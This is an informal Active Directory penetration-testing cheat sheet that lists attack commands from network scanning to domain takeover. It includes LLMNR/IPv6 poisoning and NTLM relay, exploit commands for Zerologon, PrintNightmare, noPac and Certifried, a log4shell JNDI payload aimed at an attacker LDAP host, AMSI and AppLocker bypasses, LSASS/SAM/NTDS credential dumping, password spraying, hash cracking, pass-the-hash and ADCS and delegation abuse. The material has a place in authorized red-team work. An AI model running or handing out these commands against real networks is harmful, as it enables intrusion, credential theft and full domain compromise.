Penetration Test Cheat Sheet

Techniques and Methodology

a gary23w production

a NON linear C by C.

typically I export all required variables. will list all vars and set tool resource list in near future.

Thank you,

- gary --- HELL YEAH I GOT YOUR BACK

No Creds/Scanning

Scan Network

- # enumerate SMB Hosts

    - cme smb {ip_range}

- # NMAP

    - nmap -sn {IP}  # PING SCAN (host discovery only; -sP is the old alias and -p takes a port list, not an IP)

    - nmap -Pn -sV --top-ports 50 --open {IP} # QUICK SCAN

    - nmap -Pn --script "smb-vuln*" -p139,445 {IP} # SMB SCAN (quote the wildcard so the shell does not glob it)

    - nmap -Pn -sC -sV -oA {output_file} {IP} # CLASSIC SCAN

    - nmap -sU -sC -sV -oA {output_file} {IP} # UDP SCAN

    - nmap -Pn -sC -sV -p- -oA {output_file} {IP} # FULL SCAN

- # DC IP

    - nmcli dev show eth0 # DOMAIN & DNS

    - nslookup -type=SRV _ldap._tcp.dc._msdcs.{domain_name}

- # ZONE

    - dig axfr {domain} @{name_server}

- # SMB CHECK GUEST ACCESS

    - enum4linux -a -u "" -p "" {dcip} &&
    - enum4linux -a -u "guest" -p "" {dcip}

    - smbmap -u "" -p "" -P 445 -H {dcip} &&
    - smbmap -u "guest" -p "" -P 445 -H {dcip}

    - smbclient -U '%' -L //{IP} && smbclient -U 'guest%' -L //{IP}

    - # CHECK FOR NULL SESSIONS

        - cme smb {IP} -u '' -p ''

    - # CHECK ANONYMOUS

        - cme smb {IP} -u 'a' -p ''

    - # COERCE

        - PetitPotam.py -d {domain} {listener} {target}

- # LDAP ENUMERATION

    - nmap -n -sV --script "ldap* and not brute" -p 389 {dcip}

    - ldapsearch -x -h {IP} -s base

- # POISON

    - responder -I eth0 # LLMNR/NBT-NS/mDNS poisoning (-I selects the interface). When relaying with ntlmrelayx, turn SMB and HTTP off in Responder.conf so Responder does not answer the auth itself

    - mitm6 -d {domain} # IPV6 (DHCPv6/DNS takeover of the whole segment: disruptive, run in short windows and only within scope)

    - bettercap # ARP

- # USERLIST ENUMERATION

    - enum4linux -U {dcip} | grep 'user:'

    - cme smb {IP} --users

    - net rpc group members 'Domain Users' -W '{domain}' -l '{IP}' -U '%'

    - # OSINT - internet ENUMERATION

        - nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='{domain}', userdb={userlist}" {ip_address}

Known compromise methods

quick CVE

- # ZERO LOGON (CVE-2020-1472)

    - zerologon-scan '{netbios_dc_name}' '{IP}'

    - python3 cve-2020-1472-exploit.py {BIOS_NAME} {IP} # sets the DC machine-account password to empty: the DC stays broken until restored, run restorepassword.py (below) right after dumping

    - secretsdump.py -no-pass -just-dc-user Administrator '{DOMAIN}/{MACHINE_BIOS_NAME}$@{DCIP}'

    - secretsdump.py -hashes :{HASHADMIN} {DOMAIN}/Administrator@{IP}

    - python3 restorepassword.py -target-ip {IP} {DOMAIN}/{BIOSNAME}@{BIOSNAME} -hexpass {HEX_PASSWORD}

- # ETERNAL BLUE MS17-010

    - "exploit/windows/smb/ms17_010_eternalblue"

- # SYSVOL & GPP MS14-025

    - use scanner/smb/smb_enum_gpp

    - findstr /S /l cpassword \\{FQDN}\sysvol\{FQDN}\policies\*.xml

- # TOMCAT/JBOSS

    - auxiliary/scanner/http/tomcat_enum

    - exploit/multi/http/tomcat_mgr_deploy

- # JAVA RMI

    - exploit/multi/misc/java_rmi_server

- # JAVA SERIALIZED PORT

    - ysoserial

- # SEARCHSPLOIT?

- # PROXYLOGON

- # PROXYSHELL

- # log4shell

    - ${jndi:ldap://{IP}:{PORT}/o=reference} # payload string, served by rogue-jndi (rogueJndi-1.0.jar)

USERNAME ENUM

password SPRAY # read the lockout threshold and observation window first (policy commands below) and keep attempts per account below the threshold per window

- # Got password policy

    - cme smb {IP} -u 'user' -p 'password' --pass-pol

    - enum4linux -u 'username' -p 'password' -P {IP}

    - Get-ADDefaultDomainPasswordPolicy

        - Get-ADFineGrainedPasswordPolicy -filter *

        - FGPP

            - Get-ADUserResultantPasswordPolicy -Identity {USER}

        - ldapsearch-ad.py --server '{DCIP}' -d {DOMAIN} -u {USER} -p {PASS} --type pass-pols

- # CLEAR TEXT CREDENTIALS FOUND

    - cme smb {DCIP} -u user.txt -p user.txt --no-bruteforce # test user=password (--no-bruteforce pairs line N of -u with line N of -p, so both files must be the user list)

    - cme smb {DCIP} -u user.txt -p password.txt

    - sprayhound -U users.txt -d {DOMAIN} -dc {DCIP}

ASREP Roast

- # needs CREDENTIALS

    - Get ASREPRoastable users

        - Get-DomainUser -PreauthNotRequired -Properties {SAM}

        - MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

- # Get hash

    - python GetNPUsers.py {DOMAIN}/ -userfile {usernames.txt} -format hashcat -outputfile {DOMAINHASHES.txt}

    - Rubeus.exe asreproast /format:hashcat

- # BLIND KERBEROASTING

    - Rubeus.exe kerberoast /domain:{DOMAIN} /dc:{DCIP} /nopreauth:{ASREPUSER} /spns:{USERS.txt}

    - GetUserSPNs.py -no-preauth "{ASREPUSER}" -usersfile "{USERLIST.txt}" -dc-host "{DCIP}" "{DOMAIN}"/

- # CVE-2022-33679

    - python3 CVE-2022-33679.py {DOMAIN}/{USER} {TARGET}

MITM

LISTEN

- # Listen

    - responder -I eth0

    - smbclient.py

RELAY

- # NTLM RELAY

    - SMB -> LDAP

        - ntlmrelayx.py --remove-mic --escalate-user {USER} -t ldap://{DCIP} -smb2support

        - ntlmrelayx.py -t ldaps://{DCIP} --remove-mic --add-computer {COMP} {COMPPASS} --delegate-access -smb2support

    - HTTPS -> LDAP

        - ntlmrelayx -t ldap://{DCIP} --shadow-credentials --shadow-target '{DCIP}'

    - SMB

        - FIND NOT SIGNED

            - nmap -Pn -sS -T4 --open --script smb-security-mode -p445 {ADDRESS}/{MASK}

        - unsigned

            - ntlmrelayx.py -wh {ATTACKIP} -t smb://{TARGET} -l /tmp -6 -debug

            - ntlmrelayx.py -tf {TARGETS} -smb2support -socks [-6]

    - MSSQL

        - RELAY TO MSSQL

            - ntlmrelayx.py -t mssql://{IP} -smb2support -socks

    - SMB -> Netlogon

        - ZERO-LOGON (CVE-2020-1472)

            - FROM dc01 -> dc02

                - ntlmrelayx.py -t dcsync://{DC02IP} -smb2support -auth-smb {USER}:{PASSWORD}

    - ARP

        - WSUS

            - pywsus.py

PRIVILEGE ESCALATION

LOW ACCESS

- # Get Applocker info

    - Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe (dll/msi/...)

- winpeas.exe

- # AMSI Bypass

    - https://amsi.fail/

    - Reflection

    - Patch amsi.dll

- # SEARCH PASSWORD FILES

    - findstr /si password *.txt *.xml *.docx

- # APPLOCKER BYPASS

    - use c:\Windows\Tasks

    - use C:\Windows\Temp

    - # POWERSHELL CLM BYPASS

        - installutil.exe /logfile= /LogToConsole=false /U C:\runme.exe

    - mshta.exe my.hta

    - msbuild

- # USER ACCESS CONTROL BYPASS

    - WSReset

    - FodHelper

    - MSDT

- SMBGhost CVE-2020-0796

- CVE-2021-36934(HiveNightmare/SeriousSAM)

- # SERVICE YOUR MAFUCKING ACCOUNT

    - RoguePotato

    - JuicyPotato/Lovely Potato

    - PRINTSPOOFER

- # KrBRelayUp

    - .\KrbRelayUp.exe relay -Domain {DOMAIN} -CreateNewComputerAccount -ComputerName {COMPUTER} -ComputerPassword {PASSWORD}

        - .\KrbRelayUp.exe spawn -m rbcd -d {DOMAIN} -dc {DCIP} -cn {COMPUTER} -cp {COMPUTERPASS}

KNOWN VULNS

Game over

- # MS14-068

    - FindSMB2UP.py {IP}

        - rpcclient $> lookupnames {NAME} # or, on Windows: wmic useraccount get name,sid (the user SID is needed for the forged PAC)

            - auxiliary/admin/kerberos/ms14_068_kerberos_checksum

        - goldenPac.py -dc-ip {DCIP} {DOMAIN}/{USER}:'{PASSWORD}'@{TARGET}

- # Privexchange (CVE-2019-0724, CVE-2019-0686)

    - python privexchange.py -ah {ATTACKER_HOST} {EXCHANGE} -u {USER} -d {DOMAIN} -p {PASSWORD} # -ah is the host Exchange pushes the notification to (your relay listener), not a target

- # SamAccountName / nopac CVE-2021-42287/CVE-2021-42278

    - SCAN

        - cme smb {IP} -u {USER} -p {PASSWORD} -M nopac

    - .\noPac.exe -domain {DOMAIN} -user {USER} -pass {PASS} /dc {DCFQDN} /mAccount {MACHINE} /mPassword {MACHINE_PASSWORD} /service cifs /ptt

    - WITH IMPACKET

        - addcomputer.py -> addspn.py -> renameMachine.py -> getTGT.py -> renameMachine.py -> getST.py (in this order)

- # PRINTNIGHTMARE CVE 2021-1675 / CVE-2021-34527

    - CVE-2021-1675.py {DOMAIN}/{USER}:{PASSWORD}@{TARGET} '\\{SMB_SERVER_IP}\{SHARED}\inject.dll'

- # CERTI FRIED CVE-2022-26923

    - certipy account create -u {USER}@{DOMAIN} -p '{PASSWORD}' -user 'CERTI-FRIED-PC' -pass 'CERTI-FRIED-PASS' -dns '{DC_FQDN}' # the dNSHostName is set to the target DC's FQDN so the issued cert maps to the DC account

        - certipy req -u 'CERTI-FRIED-PC$'@{DOMAIN} -p 'CERTI-FRIED-PASS' -target {CAFQDN} -template Machine

            - certipy auth -pfx {FILE} -username '{DC}$' -domain {DOMAIN} -dc-ip {DCIP}

HAVE VALID CREDS

GET AUTH

- # GET USERS

    - GetADUsers.py -all -dc-ip {DCIP} {DOMAIN}/{USERNAME}

    - cme smb {IP} -u {USER} -p '{PASSWORD}' --users

- # ENUM SMB SHARED

    - cme smb {IP} -u {USER} -p {PASSWORD} --shares

- # BLOODHOUND

    - bloodhound-python -d {DOMAIN} -u {USER} -p {PASSWORD} -gc {DCIP} -c all

    - ./rusthound -d {DOMAIN_TARGET} -u '{USER}@{DOMAIN}' -p '{PASSWORD}' -o {OUT} -z

    - import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain {DOMAIN}

    - sharphound.exe -c all -d {DOMAIN}

- # ADPEAS

- # PINGCASTLE

- # POWERVIEW

- # KERBERROASTING

    - Get ROASTABLE users

        - Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname

        - MATCH (u:User {hasspn:true}) RETURN u

        - MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

    - Get HASH

        - GetUserSPNs.py -request -dc-ip {DCIP} {DOMAIN}/{USER}:{PASSWORD}

        - Rubeus kerberoast

    - Enum DNS

        - dnstool.py -u '{DOMAIN}\user' -p '{PASSWORD}' --record '*' --action query {DCIP}

    - ENUM ADCS

        - certipy find -u '{DOMAIN}\user' -p '{PASSWORD}' -dc-ip {DOM-CONTROLLER}

    - COERCE

        - rpcdump.py {DOMAIN}/{USER}:{PASSWORD}@{DOM-SERVER} | grep MS-RPRN

            - printerbug.py '{DOMAIN}/{USERNAME}:{PASSWORD}@{PRINTERIP}' {LISTENER}

        - PetitPotam.py -d {DOMAIN} -u {USER} -p {PASSWORD} {LISTENER} {TARGET}

        - coercer.py -u {USER} -d {DOMAIN} -p {PASSWORD} -t {TARGET} -l {LISTENER}

HASH CRACKING

CRACKING LIST

- # MsCache2

    - hashcat -m 2100 -a 0 mscache-hash rockyou.TEXT

- # KERBEROS ASREP

    - hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.TEXT

- # KERBEROS 5 TGS AES256

    - hashcat -m 19700 -a 0 fuck.txt rockyou.TEXT

- # KERBEROS 5 TGS AES128

    - hashcat -m 19600 -a 0 fuck.txt rockyou.TEXT

- # KERBEROS 5 TGS

    - hashcat -m 13100 -a 0 fuck.txt rockyou.TEXT

    - john fuck.txt --format=krb5tgs --wordlist=rockyou.TEXT

- # NetNTLMv2

    - john --format=netntlmv2 hash.TEXT

    - hashcat -m 5600 -a 0 hash.TEXT rockyou.TEXT # NetNTLMv2 is mode 5600 (13100 is Kerberos TGS)

- # NetNTLMv1

    - "crack.sh"

    - john --format=netntlm hash.TEXT

    - hashcat -m 5500 -a 3 hash.TEXT

- # NTLM

    - john --format=nt hash.TEXT

    - hashcat -m 1000 -a 3 hash.TEXT

- # LM

    - john --format=lm hash.TEXT

    - hashcat -m 3000 -a 3 hash.TEXT

    - HELL YEAH

GOT ADMIN

ADMIN ACCESS

- # EXTRACT FROM LSASS

    - # PROTECTED

        - PPLdump64.exe {LSASS.EXE OR LSASS.PID} lsass.dmp

        - mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-"

    - procdump.exe -accepteula -ma lsass.exe lsass.dmp

        - mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"

    - mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"

    - load kiwi; creds_all

    - cme smb {RANGE} -u {USER} -p {PASSWORD} -M lsassy

    - lsassy -d {DOMAIN} -u {USER} -p {PASSWORD} {IP}

- # EXTRACT SAM

    - hashdump

    - reg save HKLM\SAM {FILE}; reg save HKLM\SECURITY {FILE};reg save HKLM\SYSTEM {FILE}

        - secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

    - SHADOW

        - diskshadow list shadows all

            - mklink /d c:\shadowcpy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

    - mimikatz "privilege::debug" "lsadump::sam" "exit"

    - secretsdump.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

    - reg.py {DOMAIN}/{USER}:{PASSWORD}@{IP} backup -o '\\SMB-IP\share'

        - secretsdump.py -security SECURITY -system SYSTEM LOCAL

- # LSA

    - cme smb {RANGE} -u {USERS} -p '{PASSWORDS}' --lsa

    - secretsdump.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

    - reg.py {DOMAIN}/{USER}:{PASSWORD}@{IP} backup -o '\\SMB-IP\share'

            - secretsdump.py -security SECURITY -system SYSTEM LOCAL

- # DPAPI

    - DonPAPI.py {DOMAIN}/{USER}:{PASSWORD}@{TARGET}

    - mimikatz.exe "sekurlsa::dpapi"

    - secretsdump.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

- # SEARCH PASSWORD FILES

    - findstr /si 'password' *.txt *.xml *.docx

- # SEARCH STORED PASSWORDS

    - lazagne.exe all

    - CHROME

        - %localappdata%\Google\Chrome\User Data\Default

        - SharpChromium.exe

MOVE PERMISSIONS

ACL/ACE

- # dcsync

    - mimikatz lsadump::dcsync /domain:{TARGET} /user:{DOMAIN}\administrator

    - secretsdump.py '{DOMAIN}/{USER}:{PASSWORD}@{DOMAIN_CONTROLLER}'

- # Can you write "msDS-KeyCredentialLink" on the target (and is ADCS present)?

    - whisker.exe

    - certipy shadow auto -u '{USER}@{DOMAIN}' -p '{PASSWORD}' -account '{TARGET}'

    - pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "USER_PASSWORD" --target "TARGET_SAM" --action "list"

- # ON GROUP

    - ALL PERMISSIONS

        - net group "{GROUP}" {ME} /add /domain

- # aclpwn.py

- acltoolkit '{DOMAIN}/{USER}:{PASSWORD}@{TARGET}' get-objectacl [ -all | -object {OBJECT} ]

- can read LAPS

    - MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p

- # GET LAPS

    - Get-LAPSPasswords -DomainController {DCIP} -Credential {DOMAIN}\{LOGIN} | Format-Table -AutoSize

    - foreach ($objResult in $colResults) { $objComputer = $objResult.Properties; $objComputer.name | where { $_ -ne $env:computername } | foreach-object { Get-AdmPwdPassword -ComputerName $_ } }

    - cme ldap {DCIP} -d {DOMAIN} -u {USER} -p {PASSWORD} --module laps

- # GPO check

    - SID Principles

        - Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=HELLYEAH,DC=com" -ResolveGUIDs | ? {$_.ObjectAceType -eq "Group-Policy-Container"} | select ObjectDN,ActiveDirectoryRights,SecurityIdentifier | fl

    - GET WRITE PRINCIPLES(GP-LINK ATTR ON OU)

        - Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty"} | select ObjectDN, SecurityIdentifier | fl

WEAK ADCS CONFIG

CONFIGURATION

- # Web ENROLLMENT

    - ESC8

        - ntlmrelayx.py -t http://{CAIP}/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController

            - Rubeus.exe asktgt /user:{USER} /certificate:{BASE64-CERTIFICATE} /ptt

            - gettgtpkinit.py -pfx-base64 $(cat cert.b64) {DOMAIN}/{DCNAME}$ {CACHEDFILE}

        - certipy relay -ca {CAIP} -template DomainController

            - certipy auth -pfx {CERTIFICATE} -dc-ip {DCIP}

- # TEMPLATE INFO

    - certutil -v -dsTemplate

    - certify.exe find [/VULN]

    - certipy find -u {USER}@{DOMAIN} -p {PASSWORD} -dc-ip {DOMAINCONTROLLER}

        - ESc1 CERT FROM VULN TEMPLATE

            - certipy req -u {USER}@{DOMAIN} -p {PASSWORD} -target {CASERVER} -template '{VULNTEMPLATENAME}' -ca {CANAME} -upn {TARGET}@{DOMAIN}

            - certify.exe request /ca:{SERVER}\{CANAME} /template:"{VULNTEMPLATENAME}" [/altname:"Admin"]

        - ESc3 USE AGENT

            - certify.exe request /ca:{SERVER}\{CANAME} /template:"{VULN TEMPLATE NAME}"

                - certify.exe request /ca:{SERVER}\{CANAME} /template:{TPL} /onbehalfof:{DOMAIN}\{USER} /enrollcert:{PATH.PFX} [/enrollcertpw:{CERTPASSWORD}]

            - certipy req -u {USER}@{DOMAIN} -p {PASSWORD} -target {CASERVER} -template '{VULN TEMPLATE NAME}' -ca {CANAME}

                - certipy req -u {USER}@{DOMAIN} -p {PASSWORD} -target {CASERVER} -template '{VULN TEMPLATE NAME}' -ca {CANAME} -on-behalf-of '{DOMAIN}\{USER}' -pfx {CERT}

- # getACL INFO

    - certipy find -u {USER}@{DOMAIN} -p {PASSWORD} -dc-ip {DCIP}

        - MISCONFIGURATION?

            - ESc4

                - write privs on cert

                    - certipy template -u {USER}@{DOMAIN} -p '{PASSWORD}' -template "{VULN TEMPLATE NAME}" -save-old -debug # -save-old keeps the original template so it can be restored afterwards

            - ESC7

                - MANAGE CA?

                    - certipy ca -ca {CANAME} -add-officer '{USER}' -username {USER}@{DOMAIN} -password {PASSWORD}

                - Manage CERTIFICATE?

                    - certipy ca -ca {CANAME} -enable-template '{ESC1 VULN TPL}' -username {USER}@{DOMAIN} -password {PASSWORD}

                        - certipy req -username {USER}@{DOMAIN} -password {PASSWORD} -ca {CANAME} -template "{VULN TEMPLATE NAME}" -upn {TARGET}

                - REQUEST ISSUE

                    - certipy ca -u {USER}@{DOMAIN} -p '{PASSWORD}' -ca "{CANAME}" -issue-request {REQ_ID}

                        - certipy req -u {USER}@{DOMAIN} -p '{PASSWORD}' -ca {CANAME} -retrieve {REQ_ID}

- # CA INFO

    - certutil -TCAInfo

    - certify.exe cas

- # Get CA flags

    - certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"

    - certipy / certify.exe

    - MISCONFIGURATION?

        - abuse attr set flag on me

- # GET PKI OBJ

    - certify.exe pkiobjects

- # CERT MAPPING

    - certipy shadow auto -username {ACCOUNTa}@{DOMAIN} -p {PASSa} -account {ACCOUNTb}

    - ESC9/ESC10

        - certipy account update -username {ACCOUNTa}@{DOMAIN} -password {PASSa} -user {ACCOUNTb} -upn Administrator

        - ESC9

            - certipy req -username {ACCOUNTb}@{DOMAIN} -hashes {HASHb} -ca {CANAME} -template {VULN TEMPLATE}

        - ESC10

            - certipy req -username {ACCOUNTb}@{DOMAIN} -hashes {HASHb} -ca {CANAME} -template {ANY TPL WITH AUTH}

    - ESC10

        - certipy account update -username {ACCOUNTa}@{DOMAIN} -password {PASSa} -user {ACCOUNTb} -upn '{DCNAME}$@{DOMAIN}'

    - RESET ACCOUNT B UPN

        - certipy account update -username {ACCOUNTa}@{DOMAIN} -password {PASSa} -user {ACCOUNTb} -upn {ACCOUNTb}@{DOMAIN}

LATERAL MOVEMENTS

barbra streisand

Lateral movement is a technique that adversaries use, after compromising an endpoint, to extend access to other hosts or applications in an organization. Lateral movement helps an adversary maintain persistence in the network and move closer to valuable assets.

- # WSUSpect

    - WSUSpendu.ps1

- # SCCM

    - abuse

        - SharpSCCM

        - PowerSCCM

        - CMPivot

- # MSSQL

    - find access

        - cme mssql {IP} -u {USER} -p {PASSWORD} -d {DOMAIN}

    - Users with SQL ADMIN

        - MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p

    - SPCONFIGURE execute

        - EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;

            - EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;

                - EXEC xp_cmdshell '{COMMANDS}'

    - TRUST LINK

        - Get-SQLServerLinkCrawl -username {USER} -password {PASS} -Verbose -Instance {SQL_INSTANCE} -Query "{THE_QUERY}"

    - mssqlclient.py -windows-auth {DOMAIN}/{USER}:{PASSWORD}@{IP}

        - enum_db

        - enable_xp_cmdshell

            - xp_cmdshell {COMMAND}

        - enum_impersonate

            - exec_as_user {USER}

            - exec_as_login {LOGIN}

        - xp_dir_tree {IP}

        - trustlink

            - sp_linkedservers

                - use_link

- # LOCAL USER

    - cme smb {IP} -u {USER} -p '{PASSWORD}' --local-auth

    - impacket like cleartext password without domain

- # PASSWORDS

    - INTERACTIVE-SHELL

        - psexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

        - psexec.exe -AcceptEULA \\{IP}

        - mimikatz "privilege::debug" "sekurlsa::pth /user:{USER} /domain:{DOMAIN} /ntlm:{HASH}" # pass-the-hash, needs the NT hash rather than a password

    - PSEUDO SHELL

        - atexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP} "COMMAND TO EXEC"

        - smbexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

        - wmiexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

        - dcomexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

        - crackmapexec smb {RANGE} -u {USER} -p {PASSWORD} -d {DOMAIN}

        - crackmapexec smb {RANGE} -u {USER} -p {PASSWORD} --local-auth

    - WINRM

        - evil-winrm -i {IP} -u {USER} -p {PASSWORD}

    - RDP

        - xfreerdp /u:{USER} /d:{DOMAIN} /p:{PASSWORD} /v:{IP}

    - SMB

        - smbclient.py {DOMAIN}/{USER}:{PASSWORD}@{IP}

    - MSSQL

        - crackmapexec mssql {RANGE} -u {USER} -p {PASSWORD}

        - mssqlclient.py -windows-auth {DOMAIN}/{USER}:{PASSWORD}@{IP}

    - # PTH

        - INTERACTIVE SHELL

            - psexec.py -hashes ":{HASH}" {DOMAIN}/{USER}@{IP}

            - psexec.exe -AcceptEULA \\{IP}

            - mimikatz "privilege::debug" "sekurlsa::pth /user:{USER} /domain:{DOMAIN} /ntlm:{HASH}"

        - PSEUDO SHELL

            - atexec.py -hashes ':{HASH}' {DOMAIN}/{USER}@{IP} "COMMAND TO EXEC"

            - smbexec.py -hashes ':{HASH}' {DOMAIN}/{USER}@{IP}

            - wmiexec.py -hashes ':{HASH}' {DOMAIN}/{USER}@{IP}

            - dcomexec.py -hashes ':{HASH}' {DOMAIN}/{USER}@{IP}

            - crackmapexec smb {RANGE} -u {USER} -H {HASH} -d {DOMAIN}

            - crackmapexec smb {RANGE} -u {USER} -H {HASH} --local-auth

        - WINRM

            - evil-winrm -i {IP} -u {USER} -H {HASH}

        - RDP

            - reg.py {DOMAIN}/{USER}@{IP} -hashes ':{HASH}' add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0' # enables Restricted Admin mode on the target (a persistent registry change, note it for cleanup); then xfreerdp /u:{USER} /d:{DOMAIN} /pth:{HASH} /v:{IP}

        - SMB

            - smbclient.py -hashes ":{HASH}" {DOMAIN}/{USER}@{IP}

        - MSSQL

            - crackmapexec mssql {RANGE} -u {USER} -H {HASH}

            - mssqlclient.py -windows-auth -hashes ":{HASH}" {DOMAIN}/{USER}@{IP}

    - # PASS THE KEY

        - Rubeus asktgt /user:victim /rc4:{VALUE}

            - Rubeus ptt /ticket:{TICKET}

            - Rubeus createnetonly /program:C:\Windows\System32\cmd.exe [upncont.exe]

                - Rubeus ptt /luid:0xdeadbeef /ticket:{TICKET}

        - getTGT.py -hashes ':{HASH}' {DOMAIN}/{USER}

        - getTGT.py -aesKey '{KEY}' {DOMAIN}/{USER}@{IP}

- # KERBEROS

    - PTT (PASS THE TICKET)

        - convert

            - ticketConverter.py {KIRB or CACHE} {CACHE OR KIRB}

        - export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache

        - mimikatz kerberos::ptc "{TICKET}"

        - Rubeus.exe ptt /ticket:{TICKET}

        - proxychains secretsdump -k '{DOMAIN}'/'{USER}'@'{IP}'

        - MOD SPN

            - tgssub.py -in {TICKET CCACHE} -out {NEWTICKET.CCACHE} -altservice "{SERVICE}/{TARGET}"

    - AES

        - proxychains secretsdump -aesKey '{KEY}' '{DOMAIN}'/'{USER}'@'{IP}'

- # SOCKS

    - proxychains lookupsid.py {DOMAIN}/{USER}@{IP} -no-pass -domain-sids

    - proxychains mssqlclient.py -windows-auth {DOMAIN}/{USER}@{IP} -no-pass

    - proxychains secretsdump -no-pass '{DOMAIN}'/'{USER}'@'{IP}'

    - pseudo

        - proxychains atexec.py -no-pass {DOMAIN}/{USER}@{IP} "COMMAND"

        - proxychains smbexec.py -no-pass {DOMAIN}/{USER}@{IP}

    - SMB SEARCH FILES

        - proxychains smbclient.py -no-pass {USER}@{IP}

- # PFX CERT

    - GET HASH NTLM

        - certipy auth -pfx {CERT FILES} -dc-ip {DCIP}

    - PTC

        - pkinit

            - gettgtpkinit.py -cert-pfx "{PFXFILES}" [-pfx-pass "{CERTPASSWORD}"] "{FQDN}/{USER}" "{TGT CACHE FILES}"

            - Rubeus.exe asktgt /user:"{USERNAME}" /certificate:"{PFX FILE}" [/password:"{CERTIFICATE PASSWORD}"] /domain:"{FQDN DOMAIN}" /dc:"{DCIP}" /show

            - certipy auth -pfx {CERTFILES} -dc-ip {DCIP}

        - Schannel

            - certipy auth -pfx {CERTFILES} -ldap-shell

                - add_computer

                    - set_rbcd

DOMAIN Administrator

HELL YEAH

to make changes to global policies that impact all the computers and users connected to that Active Directory organization.

- # Domain admin

    - dump ntds.dit

        - cme smb {DCIP} -u {USER} -p {PASSWORD} -d {DOMAIN} --ntds

        - secretsdump.py '{DOMAIN}/{USER}:{PASSWORD}'@{IP}

        - ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

            - secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntlm-extract # offline parse of the IFM copy, no -hashes needed

        - dpapi.py backupkeys -hashes ':{HASH}' -t Administrator@{DCIP} --export

            - DonPAPI -pvk {BACKUPKEYS FOR THE DOMAIN.PVK} -H ':{HASH}' {DOMAIN}/{USER}@{IP_RANGE}

delegate Kerberos

delegations

Kerberos delegation is a delegation setting that allows applications to request end-user access credentials to access resources on behalf of the originating user.

- # UNCONSTRAINED

    - get machines

        - Get-NetComputer -Unconstrained

        - Get-DomainComputer -Unconstrained -Properties DnsHostName

        - MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

        - MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p

    - UAC: ADS_UF_TRUSTED_FOR_DELEGATION

        - Get tickets

            - mimikatz "privilege::debug" "sekurlsa::tickets /export"

            - Rubeus dump /service:krbtgt /nowrap

            - Rubeus dump /luid:0xdeadbeef /nowrap

        - FORCE CONN

            - Rubeus monitor /interval:5

    - # CONSTRAINED

        - Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo

        - Get-DomainUser -TrustedToAuth

        - MATCH (c:Computer), (t:Computer), p= ((c)-[:AllowedToDelegate]->(t)) RETURN p

        - MATCH (u:User {owned:true}), (c:Computer {name:"{TARGET.FQDN}"}), p=shortestPath((u)-[*1..]->(c)) RETURN p

    - # PROTOCOL TRANSITION

        - Rubeus hash /password:{PASSWORD}

        - Rubeus asktgt /user:{USER} /domain:{DOMAIN} /aes256:{AES256HASH}

            - Rubeus s4u /ticket:{TICKET} /impersonateuser:{ADMIN} /msdsspn:{CONTRAINT} /altservice:CIFS /ptt

                - ALT

                    - HOST

                        - psexec \\\{TARGET} {COMMAND}

                    - HTTP

                        - Enter-Pssession -computername {TARGET}

                        - Invoke-Command {TARGET} -Scriptblock {{PUTS DA COMMAND HERE}}

                    - CIFS

                        - dir \\{TARGET}\c$

                    - LDAP CHECK

    - # KERBEROS: without protocol transition

        - RBCD

            - addcomputer.py -computer-name '{RBC_COM}$' -computer-pass '{RBCCOMPASS}' -dc-ip {DCIP} '{DOMAIN}/{USER}:{PASSWORD}'

                - rbcd.py -delegate-from '{RBCDCOM}$' -delegate-to '{CONSTRAINT}$' -dc-ip '{DCIP}' -action 'write' -hashes ':{HASH}' '{DOMAIN}/{CONSTRAINT}$'

                    - getST.py -self -impersonate "administrator" -dc-ip {DCIP} '{DOMAIN}/{RBCDCOM}$:{RBCD_COMPASS}'

                        - getST.py -spn host/{CONSTRAINED} -hashes ':{HASH}' '{DOMAIN}/{COMPUTER TO IMPERSONATE}$' -impersonate Administrator -dc-ip {DCIP} -additional-ticket {LAST TICKET}

                            - getST.py -spn {CONSTRAINED_SPN}/{TARGET} -hashes ':{HASH}' '{DOMAIN}/{CONSTRAINED}$' -impersonate Administrator -dc-ip {DCIP} -additional-ticket {LAST TICKET}

- # RBCD

    - Object: msDS-AllowedToActOnBehalfOfOtherIdentity

